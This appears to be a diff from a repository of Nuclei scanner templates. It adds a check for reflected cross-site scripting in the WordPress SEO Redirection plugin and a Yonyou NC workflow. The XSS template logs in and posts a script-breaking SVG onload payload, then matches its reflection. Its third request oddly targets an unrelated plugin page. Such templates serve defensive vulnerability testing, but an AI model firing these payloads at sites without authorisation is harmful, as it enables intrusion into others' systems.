tags: yongyou,u8,oa,sqli
tags: yonyou,oa,sqli
requests:
- method: GET

54
vulnerabilities/wordpress/seo-redirection-xss.yaml Normal file
View File

@ -0,0 +1,54 @@
id: seo-redirection-xss
info:
name: WordPress SEO Redirection < 7.4 - Reflected Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: |
The plugin does not escape the tab parameter before outputting it back in JavaScript code, leading to a Reflected Cross-Site Scripting issue.
remediation: Fixed in version 7.4.
reference:
- https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea
tags: wordpress,xss,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/options-general.php?page=seo-redirection.php&tab=cutom HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
tab=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E
- |
GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><svg/onload=alert(/XSS/)>"
- "settings_page_seo-redirection"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

0
workflows/weblogic-workflow.yaml Executable file → Normal file
View File

13
workflows/yonyou-nc-workflow.yaml Normal file
View File

@ -0,0 +1,13 @@
id: yonyou-ufida-nc-workflow
info:
name: Yonyou Ufida NC Security Checks
author: Arm!tage
description: A simple workflow that runs all yonyou ufida nc related nuclei templates on a given target.
workflows:
- template: technologies/fingerprinthub-web-fingerprints.yaml
matchers:
- name: yonyou-ism
subtemplates:
- tags: yonyou